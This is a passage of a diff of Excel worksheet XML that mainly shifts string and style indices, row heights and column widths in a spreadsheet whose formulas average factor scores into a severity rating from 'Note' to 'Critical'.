       <c r="F112" s="27" t="s">
-        <v>125</v>
-      </c>
-    </row>
-    <row r="113" spans="1:6" ht="17.25" customHeight="1" x14ac:dyDescent="0.2">
+        <v>124</v>
+      </c>
+    </row>
+    <row r="113" spans="1:6" ht="17.25" customHeight="1" x14ac:dyDescent="0.15">
       <c r="A113" s="20" t="s">
+        <v>296</v>
+      </c>
+      <c r="B113" s="20" t="s">
+        <v>308</v>
+      </c>
+      <c r="C113" s="41" t="s">
+        <v>110</v>
+      </c>
+      <c r="D113" s="44" t="s">
+        <v>430</v>
+      </c>
+      <c r="E113" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F113" s="29"/>
+    </row>
+    <row r="114" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+      <c r="A114" s="20" t="s">
         <v>297</v>
       </c>
-      <c r="B113" s="20" t="s">
+      <c r="B114" s="20" t="s">
         <v>309</v>
       </c>
-      <c r="C113" s="41" t="s">
+      <c r="C114" s="41" t="s">
+        <v>427</v>
+      </c>
+      <c r="D114" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E114" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F114" s="29"/>
+    </row>
+    <row r="115" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+      <c r="A115" s="20" t="s">
+        <v>298</v>
+      </c>
+      <c r="B115" s="20" t="s">
+        <v>310</v>
+      </c>
+      <c r="C115" s="41" t="s">
+        <v>428</v>
+      </c>
+      <c r="D115" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E115" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F115" s="20"/>
+    </row>
+    <row r="116" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+      <c r="A116" s="20" t="s">
+        <v>299</v>
+      </c>
+      <c r="B116" s="20" t="s">
+        <v>311</v>
+      </c>
+      <c r="C116" s="41" t="s">
+        <v>429</v>
+      </c>
+      <c r="D116" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E116" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F116" s="20"/>
+    </row>
+    <row r="117" spans="1:6" ht="48" x14ac:dyDescent="0.15">
+      <c r="A117" s="20" t="s">
+        <v>300</v>
+      </c>
+      <c r="B117" s="20" t="s">
+        <v>312</v>
+      </c>
+      <c r="C117" s="41" t="s">
+        <v>431</v>
+      </c>
+      <c r="D117" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E117" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F117" s="20"/>
+    </row>
+    <row r="118" spans="1:6" ht="24" customHeight="1" x14ac:dyDescent="0.15">
+      <c r="A118" s="20" t="s">
+        <v>301</v>
+      </c>
+      <c r="B118" s="20" t="s">
+        <v>313</v>
+      </c>
+      <c r="C118" s="41" t="s">
+        <v>432</v>
+      </c>
+      <c r="D118" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E118" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F118" s="20"/>
+    </row>
+    <row r="119" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+      <c r="A119" s="20" t="s">
+        <v>302</v>
+      </c>
+      <c r="B119" s="20" t="s">
+        <v>314</v>
+      </c>
+      <c r="C119" s="41" t="s">
+        <v>433</v>
+      </c>
+      <c r="D119" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E119" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F119" s="20"/>
+    </row>
+    <row r="120" spans="1:6" ht="26" x14ac:dyDescent="0.15">
+      <c r="A120" s="20" t="s">
+        <v>303</v>
+      </c>
+      <c r="B120" s="20" t="s">
+        <v>315</v>
+      </c>
+      <c r="C120" s="41" t="s">
         <v>111</v>
       </c>
-      <c r="D113" s="44" t="s">
-        <v>433</v>
-      </c>
-      <c r="E113" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F113" s="29"/>
-    </row>
-    <row r="114" spans="1:6" ht="24" x14ac:dyDescent="0.2">
-      <c r="A114" s="20" t="s">
-        <v>298</v>
-      </c>
-      <c r="B114" s="20" t="s">
-        <v>310</v>
-      </c>
-      <c r="C114" s="41" t="s">
-        <v>430</v>
-      </c>
-      <c r="D114" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E114" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F114" s="29"/>
-    </row>
-    <row r="115" spans="1:6" ht="24" x14ac:dyDescent="0.2">
-      <c r="A115" s="20" t="s">
-        <v>299</v>
-      </c>
-      <c r="B115" s="20" t="s">
-        <v>311</v>
-      </c>
-      <c r="C115" s="41" t="s">
-        <v>431</v>
-      </c>
-      <c r="D115" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E115" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F115" s="20"/>
-    </row>
-    <row r="116" spans="1:6" ht="24" x14ac:dyDescent="0.2">
-      <c r="A116" s="20" t="s">
-        <v>300</v>
-      </c>
-      <c r="B116" s="20" t="s">
-        <v>312</v>
-      </c>
-      <c r="C116" s="41" t="s">
-        <v>432</v>
-      </c>
-      <c r="D116" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E116" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F116" s="20"/>
-    </row>
-    <row r="117" spans="1:6" ht="48" x14ac:dyDescent="0.2">
-      <c r="A117" s="20" t="s">
-        <v>301</v>
-      </c>
-      <c r="B117" s="20" t="s">
-        <v>313</v>
-      </c>
-      <c r="C117" s="41" t="s">
+      <c r="D120" s="44" t="s">
+        <v>457</v>
+      </c>
+      <c r="E120" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F120" s="20"/>
+    </row>
+    <row r="121" spans="1:6" ht="25.5" customHeight="1" x14ac:dyDescent="0.15">
+      <c r="A121" s="20" t="s">
+        <v>304</v>
+      </c>
+      <c r="B121" s="20" t="s">
+        <v>316</v>
+      </c>
+      <c r="C121" s="41" t="s">
+        <v>435</v>
+      </c>
+      <c r="D121" s="44" t="s">
         <v>434</v>
       </c>
-      <c r="D117" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E117" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F117" s="20"/>
-    </row>
-    <row r="118" spans="1:6" ht="24" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A118" s="20" t="s">
-        <v>302</v>
-      </c>
-      <c r="B118" s="20" t="s">
-        <v>314</v>
-      </c>
-      <c r="C118" s="41" t="s">
-        <v>435</v>
-      </c>
-      <c r="D118" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E118" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F118" s="20"/>
-    </row>
-    <row r="119" spans="1:6" ht="24" x14ac:dyDescent="0.2">
-      <c r="A119" s="20" t="s">
-        <v>303</v>
-      </c>
-      <c r="B119" s="20" t="s">
-        <v>315</v>
-      </c>
-      <c r="C119" s="41" t="s">
+      <c r="E121" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F121" s="20"/>
+    </row>
+    <row r="122" spans="1:6" ht="48" x14ac:dyDescent="0.15">
+      <c r="A122" s="20" t="s">
+        <v>305</v>
+      </c>
+      <c r="B122" s="20" t="s">
+        <v>317</v>
+      </c>
+      <c r="C122" s="41" t="s">
+        <v>437</v>
+      </c>
+      <c r="D122" s="44" t="s">
+        <v>451</v>
+      </c>
+      <c r="E122" s="38" t="s">
+        <v>123</v>
+      </c>
+    </row>
+    <row r="123" spans="1:6" ht="36" x14ac:dyDescent="0.15">
+      <c r="A123" s="20" t="s">
+        <v>306</v>
+      </c>
+      <c r="B123" s="20" t="s">
+        <v>318</v>
+      </c>
+      <c r="C123" s="41" t="s">
         <v>436</v>
       </c>
-      <c r="D119" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E119" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F119" s="20"/>
-    </row>
-    <row r="120" spans="1:6" ht="25.5" x14ac:dyDescent="0.2">
-      <c r="A120" s="20" t="s">
-        <v>304</v>
-      </c>
-      <c r="B120" s="20" t="s">
-        <v>316</v>
-      </c>
-      <c r="C120" s="41" t="s">
-        <v>112</v>
-      </c>
-      <c r="D120" s="44" t="s">
-        <v>437</v>
-      </c>
-      <c r="E120" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F120" s="20"/>
-    </row>
-    <row r="121" spans="1:6" ht="25.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A121" s="20" t="s">
-        <v>305</v>
-      </c>
-      <c r="B121" s="20" t="s">
-        <v>317</v>
-      </c>
-      <c r="C121" s="41" t="s">
-        <v>439</v>
-      </c>
-      <c r="D121" s="44" t="s">
-        <v>438</v>
-      </c>
-      <c r="E121" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F121" s="20"/>
-    </row>
-    <row r="122" spans="1:6" ht="60" x14ac:dyDescent="0.2">
-      <c r="A122" s="20" t="s">
-        <v>306</v>
-      </c>
-      <c r="B122" s="20" t="s">
-        <v>318</v>
-      </c>
-      <c r="C122" s="41" t="s">
-        <v>441</v>
-      </c>
-      <c r="D122" s="44" t="s">
-        <v>456</v>
-      </c>
-      <c r="E122" s="38" t="s">
-        <v>124</v>
-      </c>
-    </row>
-    <row r="123" spans="1:6" ht="48" x14ac:dyDescent="0.2">
-      <c r="A123" s="20" t="s">
+      <c r="D123" s="44" t="s">
+        <v>442</v>
+      </c>
+      <c r="E123" s="38" t="s">
+        <v>123</v>
+      </c>
+      <c r="F123" s="29"/>
+    </row>
+    <row r="124" spans="1:6" ht="36" x14ac:dyDescent="0.15">
+      <c r="A124" s="20" t="s">
         <v>307</v>
       </c>
-      <c r="B123" s="20" t="s">
+      <c r="B124" s="20" t="s">
         <v>319</v>
       </c>
-      <c r="C123" s="41" t="s">
-        <v>440</v>
-      </c>
-      <c r="D123" s="44" t="s">
-        <v>446</v>
-      </c>
-      <c r="E123" s="38" t="s">
-        <v>124</v>
-      </c>
-      <c r="F123" s="29"/>
-    </row>
-    <row r="124" spans="1:6" ht="36" x14ac:dyDescent="0.2">
-      <c r="A124" s="20" t="s">
-        <v>308</v>
-      </c>
-      <c r="B124" s="20" t="s">
-        <v>320</v>
-      </c>
       <c r="C124" s="41" t="s">
-        <v>457</v>
+        <v>452</v>
       </c>
       <c r="D124" s="44" t="s">
-        <v>458</v>
+        <v>453</v>
       </c>
       <c r="E124" s="38" t="s">
-        <v>124</v>
+        <v>123</v>
       </c>
       <c r="F124" s="29"/>
     </row>
-    <row r="125" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.2">
+    <row r="125" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.15">
       <c r="A125" s="20"/>
       <c r="B125" s="7"/>
       <c r="C125" s="41"/>
       <c r="D125" s="44"/>
       <c r="E125" s="21"/>
     </row>
-    <row r="126" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.2">
+    <row r="126" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.15">
       <c r="A126" s="37"/>
       <c r="B126" s="7"/>
       <c r="C126" s="41"/>
       <c r="D126" s="44"/>
       <c r="E126" s="21"/>
     </row>
-    <row r="127" spans="1:6" x14ac:dyDescent="0.2">
+    <row r="127" spans="1:6" x14ac:dyDescent="0.15">
       <c r="A127" s="25" t="s">
-        <v>124</v>
-      </c>
-    </row>
-    <row r="128" spans="1:6" x14ac:dyDescent="0.2">
+        <v>123</v>
+      </c>
+    </row>
+    <row r="128" spans="1:6" x14ac:dyDescent="0.15">
       <c r="A128" s="25" t="s">
+        <v>115</v>
+      </c>
+    </row>
+    <row r="129" spans="1:1" x14ac:dyDescent="0.15">
+      <c r="A129" s="25" t="s">
         <v>116</v>
       </c>
     </row>
-    <row r="129" spans="1:1" x14ac:dyDescent="0.2">
-      <c r="A129" s="25" t="s">
-        <v>117</v>
-      </c>
-    </row>
-    <row r="130" spans="1:1" x14ac:dyDescent="0.2">
+    <row r="130" spans="1:1" x14ac:dyDescent="0.15">
       <c r="A130" s="25" t="s">
         <v>7</v>
       </c>
@@ -6771,32 +6727,32 @@
       <selection activeCell="J3" sqref="J3"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
+  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="13" x14ac:dyDescent="0.15"/>
   <cols>
-    <col min="1" max="1" width="4.42578125" bestFit="1" customWidth="1"/>
-    <col min="2" max="2" width="19.7109375" customWidth="1"/>
-    <col min="3" max="3" width="15.7109375" style="29" bestFit="1" customWidth="1"/>
-    <col min="4" max="4" width="17.7109375" customWidth="1"/>
-    <col min="5" max="5" width="8.7109375" bestFit="1" customWidth="1"/>
-    <col min="6" max="6" width="10.28515625" bestFit="1" customWidth="1"/>
-    <col min="7" max="7" width="8.7109375" bestFit="1" customWidth="1"/>
-    <col min="8" max="8" width="23.140625" bestFit="1" customWidth="1"/>
-    <col min="9" max="9" width="16.85546875" bestFit="1" customWidth="1"/>
+    <col min="1" max="1" width="4.5" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="19.6640625" customWidth="1"/>
+    <col min="3" max="3" width="15.6640625" style="29" bestFit="1" customWidth="1"/>
+    <col min="4" max="4" width="17.6640625" customWidth="1"/>
+    <col min="5" max="5" width="8.6640625" bestFit="1" customWidth="1"/>
+    <col min="6" max="6" width="10.33203125" bestFit="1" customWidth="1"/>
+    <col min="7" max="7" width="8.6640625" bestFit="1" customWidth="1"/>
+    <col min="8" max="8" width="23.1640625" bestFit="1" customWidth="1"/>
+    <col min="9" max="9" width="16.83203125" bestFit="1" customWidth="1"/>
     <col min="10" max="10" width="9" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:10" ht="30" x14ac:dyDescent="0.2">
+    <row r="1" spans="1:10" ht="30" x14ac:dyDescent="0.15">
       <c r="A1" s="33" t="s">
+        <v>334</v>
+      </c>
+      <c r="B1" s="33" t="s">
         <v>335</v>
       </c>
-      <c r="B1" s="33" t="s">
-        <v>336</v>
-      </c>
       <c r="C1" s="33" t="s">
-        <v>339</v>
+        <v>338</v>
       </c>
       <c r="D1" s="33" t="s">
-        <v>338</v>
+        <v>337</v>
       </c>
       <c r="E1" s="33" t="s">
         <v>51</v>
@@ -6805,47 +6761,47 @@
         <v>52</v>
       </c>
       <c r="G1" s="33" t="s">
-        <v>121</v>
+        <v>120</v>
       </c>
       <c r="H1" s="33" t="s">
+        <v>340</v>
+      </c>
+      <c r="I1" s="33" t="s">
+        <v>118</v>
+      </c>
+      <c r="J1" s="47" t="s">
         <v>341</v>
       </c>
-      <c r="I1" s="33" t="s">
-        <v>119</v>
-      </c>
-      <c r="J1" s="47" t="s">
-        <v>342</v>
-      </c>
-    </row>
-    <row r="2" spans="1:10" ht="25.5" x14ac:dyDescent="0.2">
+    </row>
+    <row r="2" spans="1:10" ht="26" x14ac:dyDescent="0.15">
       <c r="A2" s="30">
         <v>1</v>
       </c>
       <c r="B2" s="32" t="s">
-        <v>337</v>
+        <v>336</v>
       </c>
       <c r="C2" s="32" t="s">
-        <v>253</v>
+        <v>252</v>
       </c>
       <c r="D2" s="32" t="s">
-        <v>340</v>
+        <v>339</v>
       </c>
       <c r="E2" s="31" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="F2" s="32" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="G2" s="35" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="H2" s="30"/>
       <c r="I2" s="30"/>
       <c r="J2" s="48" t="s">
-        <v>343</v>
-      </c>
-    </row>
-    <row r="3" spans="1:10" x14ac:dyDescent="0.2">
+        <v>342</v>
+      </c>
+    </row>
+    <row r="3" spans="1:10" x14ac:dyDescent="0.15">
       <c r="A3" s="34"/>
       <c r="B3" s="34"/>
       <c r="C3" s="34"/>
@@ -6856,7 +6812,7 @@
       <c r="H3" s="34"/>
       <c r="I3" s="34"/>
     </row>
-    <row r="4" spans="1:10" x14ac:dyDescent="0.2">
+    <row r="4" spans="1:10" x14ac:dyDescent="0.15">
       <c r="A4" s="34"/>
       <c r="B4" s="34"/>
       <c r="C4" s="34"/>
@@ -6894,43 +6850,43 @@
   <dimension ref="A1:J26"/>
   <sheetViews>
     <sheetView topLeftCell="A4" workbookViewId="0">
-      <selection activeCell="C24" sqref="C24"/>
+      <selection activeCell="B13" sqref="B13:D13"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
+  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="13" x14ac:dyDescent="0.15"/>
   <cols>
-    <col min="1" max="1" width="18.42578125" bestFit="1" customWidth="1"/>
-    <col min="2" max="4" width="14.7109375" customWidth="1"/>
-    <col min="5" max="5" width="3.7109375" customWidth="1"/>
-    <col min="6" max="6" width="20.7109375" bestFit="1" customWidth="1"/>
-    <col min="7" max="7" width="42.7109375" customWidth="1"/>
-    <col min="8" max="8" width="3.7109375" customWidth="1"/>
-    <col min="10" max="10" width="40.5703125" bestFit="1" customWidth="1"/>
+    <col min="1" max="1" width="18.5" bestFit="1" customWidth="1"/>
+    <col min="2" max="4" width="14.6640625" customWidth="1"/>
+    <col min="5" max="5" width="3.6640625" customWidth="1"/>
+    <col min="6" max="6" width="20.6640625" bestFit="1" customWidth="1"/>
+    <col min="7" max="7" width="42.6640625" customWidth="1"/>
+    <col min="8" max="8" width="3.6640625" customWidth="1"/>
+    <col min="10" max="10" width="40.5" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.35">
-      <c r="A1" s="58" t="s">
+    <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.25">
+      <c r="A1" s="54" t="s">
         <v>8</v>
       </c>
-      <c r="B1" s="58"/>
-      <c r="C1" s="58"/>
-      <c r="D1" s="58"/>
-      <c r="E1" s="58"/>
-      <c r="F1" s="58"/>
-      <c r="G1" s="58"/>
-    </row>
-    <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A3" s="59" t="s">
+      <c r="B1" s="54"/>
+      <c r="C1" s="54"/>
+      <c r="D1" s="54"/>
+      <c r="E1" s="54"/>
+      <c r="F1" s="54"/>
+      <c r="G1" s="54"/>
+    </row>
+    <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.15">
+      <c r="A3" s="55" t="s">
         <v>9</v>
       </c>
-      <c r="B3" s="59"/>
-      <c r="C3" s="59"/>
-      <c r="D3" s="59"/>
+      <c r="B3" s="55"/>
+      <c r="C3" s="55"/>
+      <c r="D3" s="55"/>
       <c r="E3" s="2"/>
-      <c r="F3" s="59" t="s">
+      <c r="F3" s="55" t="s">
         <v>10</v>
       </c>
-      <c r="G3" s="59"/>
+      <c r="G3" s="55"/>
       <c r="I3" t="s">
         <v>11</v>
       </c>
@@ -6938,28 +6894,28 @@
         <v>12</v>
       </c>
     </row>
-    <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A4" s="60" t="s">
+    <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.15">
+      <c r="A4" s="56" t="s">
         <v>13</v>
       </c>
-      <c r="B4" s="60"/>
-      <c r="C4" s="60"/>
-      <c r="D4" s="60"/>
+      <c r="B4" s="56"/>
+      <c r="C4" s="56"/>
+      <c r="D4" s="56"/>
       <c r="E4" s="3"/>
-      <c r="F4" s="60" t="s">
+      <c r="F4" s="56" t="s">
         <v>14</v>
       </c>
-      <c r="G4" s="60"/>
-    </row>
-    <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+      <c r="G4" s="56"/>
+    </row>
+    <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A5" s="4" t="s">
         <v>15</v>
       </c>
-      <c r="B5" s="55" t="s">
+      <c r="B5" s="51" t="s">
         <v>61</v>
       </c>
-      <c r="C5" s="56"/>
-      <c r="D5" s="56"/>
+      <c r="C5" s="52"/>
+      <c r="D5" s="52"/>
       <c r="E5" s="5">
         <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
         <v>3</v>
@@ -6975,15 +6931,15 @@
         <v>2</v>
       </c>
     </row>
-    <row r="6" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="6" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A6" s="4" t="s">
         <v>19</v>
       </c>
-      <c r="B6" s="63" t="s">
+      <c r="B6" s="59" t="s">
         <v>62</v>
       </c>
-      <c r="C6" s="63"/>
-      <c r="D6" s="63"/>
+      <c r="C6" s="59"/>
+      <c r="D6" s="59"/>
       <c r="E6" s="5">
         <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
         <v>4</v>
@@ -6999,15 +6955,15 @@
         <v>3</v>
       </c>
     </row>
-    <row r="7" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="7" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A7" s="4" t="s">
         <v>23</v>
       </c>
-      <c r="B7" s="63" t="s">
+      <c r="B7" s="59" t="s">
         <v>56</v>
       </c>
-      <c r="C7" s="63"/>
-      <c r="D7" s="63"/>
+      <c r="C7" s="59"/>
+      <c r="D7" s="59"/>
       <c r="E7" s="5">
         <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
         <v>0</v>
@@ -7023,15 +6979,15 @@
         <v>1</v>
       </c>
     </row>
-    <row r="8" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="8" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A8" s="4" t="s">
         <v>27</v>
       </c>
-      <c r="B8" s="63" t="s">
+      <c r="B8" s="59" t="s">
         <v>28</v>
       </c>
-      <c r="C8" s="63"/>
-      <c r="D8" s="63"/>
+      <c r="C8" s="59"/>
+      <c r="D8" s="59"/>
       <c r="E8" s="5">
         <f>VLOOKUP(B8,[1]Sheet3!G2:H8,2,FALSE)</f>
         <v>2</v>
@@ -7047,7 +7003,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="9" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="9" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A9" s="4"/>
       <c r="B9" s="8"/>
       <c r="C9" s="8"/>
@@ -7057,29 +7013,29 @@
       <c r="G9" s="8"/>
       <c r="H9" s="7"/>
     </row>
-    <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A10" s="60" t="s">
+    <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.15">
+      <c r="A10" s="56" t="s">
         <v>31</v>
       </c>
-      <c r="B10" s="60"/>
-      <c r="C10" s="60"/>
-      <c r="D10" s="60"/>
+      <c r="B10" s="56"/>
+      <c r="C10" s="56"/>
+      <c r="D10" s="56"/>
       <c r="E10" s="3"/>
-      <c r="F10" s="60" t="s">
+      <c r="F10" s="56" t="s">
         <v>32</v>
       </c>
-      <c r="G10" s="60"/>
+      <c r="G10" s="56"/>
       <c r="H10" s="3"/>
     </row>
-    <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A11" s="4" t="s">
         <v>33</v>
       </c>
-      <c r="B11" s="54" t="s">
+      <c r="B11" s="60" t="s">
         <v>59</v>
       </c>
-      <c r="C11" s="54"/>
-      <c r="D11" s="54"/>
+      <c r="C11" s="60"/>
+      <c r="D11" s="60"/>
       <c r="E11" s="5">
         <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
         <v>1</v>
@@ -7095,15 +7051,15 @@
         <v>3</v>
       </c>
     </row>
-    <row r="12" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="12" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A12" s="4" t="s">
         <v>37</v>
       </c>
-      <c r="B12" s="54" t="s">
+      <c r="B12" s="60" t="s">
         <v>70</v>
       </c>
-      <c r="C12" s="54"/>
-      <c r="D12" s="54"/>
+      <c r="C12" s="60"/>
+      <c r="D12" s="60"/>
       <c r="E12" s="5">
         <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
         <v>5</v>
@@ -7119,15 +7075,15 @@
         <v>4</v>
       </c>
     </row>
-    <row r="13" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="13" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A13" s="4" t="s">
         <v>40</v>
       </c>
-      <c r="B13" s="54" t="s">
+      <c r="B13" s="60" t="s">
         <v>64</v>
       </c>
-      <c r="C13" s="54"/>
-      <c r="D13" s="54"/>
+      <c r="C13" s="60"/>
+      <c r="D13" s="60"/>
       <c r="E13" s="5">
         <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
         <v>4</v>
@@ -7143,15 +7099,15 @@
         <v>5</v>
       </c>
     </row>
-    <row r="14" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="14" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A14" s="4" t="s">
         <v>44</v>
       </c>
-      <c r="B14" s="54" t="s">
+      <c r="B14" s="60" t="s">
         <v>65</v>
       </c>
-      <c r="C14" s="54"/>
-      <c r="D14" s="54"/>
+      <c r="C14" s="60"/>
+      <c r="D14" s="60"/>
       <c r="E14" s="5">
         <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
         <v>3</v>
@@ -7167,57 +7123,57 @@
         <v>3</v>
       </c>
     </row>
-    <row r="15" spans="1:10" ht="15" x14ac:dyDescent="0.25">
+    <row r="15" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="E15" s="4"/>
     </row>
-    <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.25">
-      <c r="A16" s="61" t="s">
+    <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="A16" s="57" t="s">
         <v>48</v>
       </c>
-      <c r="B16" s="57">
+      <c r="B16" s="53">
         <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
         <v>2.75</v>
       </c>
-      <c r="C16" s="57"/>
-      <c r="D16" s="57"/>
+      <c r="C16" s="53"/>
+      <c r="D16" s="53"/>
       <c r="E16" s="4"/>
-      <c r="F16" s="62" t="s">
+      <c r="F16" s="58" t="s">
         <v>49</v>
       </c>
-      <c r="G16" s="57">
+      <c r="G16" s="53">
         <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
         <v>2.625</v>
       </c>
     </row>
-    <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A17" s="61"/>
-      <c r="B17" s="57"/>
-      <c r="C17" s="57"/>
-      <c r="D17" s="57"/>
-      <c r="F17" s="62"/>
-      <c r="G17" s="57"/>
-    </row>
-    <row r="20" spans="1:7" ht="18.75" x14ac:dyDescent="0.3">
-      <c r="B20" s="51" t="s">
+    <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.15">
+      <c r="A17" s="57"/>
+      <c r="B17" s="53"/>
+      <c r="C17" s="53"/>
+      <c r="D17" s="53"/>
+      <c r="F17" s="58"/>
+      <c r="G17" s="53"/>
+    </row>
+    <row r="20" spans="1:7" ht="19" x14ac:dyDescent="0.25">
+      <c r="B20" s="61" t="s">
         <v>50</v>
       </c>
-      <c r="C20" s="51"/>
-      <c r="D20" s="51"/>
-      <c r="E20" s="52" t="str">
+      <c r="C20" s="61"/>
+      <c r="D20" s="61"/>
+      <c r="E20" s="62" t="str">
         <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
         <v>Note</v>
       </c>
-      <c r="F20" s="52"/>
+      <c r="F20" s="62"/>
       <c r="G20" s="1"/>
     </row>
-    <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.25">
-      <c r="B22" s="53" t="s">
+    <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.2">
+      <c r="B22" s="63" t="s">
         <v>51</v>
       </c>
-      <c r="C22" s="53"/>
-      <c r="D22" s="53"/>
-    </row>
-    <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.25">
+      <c r="C22" s="63"/>
+      <c r="D22" s="63"/>
+    </row>
+    <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.2">
       <c r="A23" s="9" t="s">
         <v>52</v>
       </c>
@@ -7235,7 +7191,7 @@
       </c>
       <c r="F23" s="10"/>
     </row>
-    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
+    <row r="24" spans="1:7" x14ac:dyDescent="0.15">
       <c r="A24" s="11" t="str">
         <f>IF($B16&lt;3,"-&gt;Low&lt;-","Low")</f>
         <v>-&gt;Low&lt;-</v>
@@ -7254,7 +7210,7 @@
       </c>
       <c r="F24" s="15"/>
     </row>
-    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
+    <row r="25" spans="1:7" x14ac:dyDescent="0.15">
       <c r="A25" s="11" t="str">
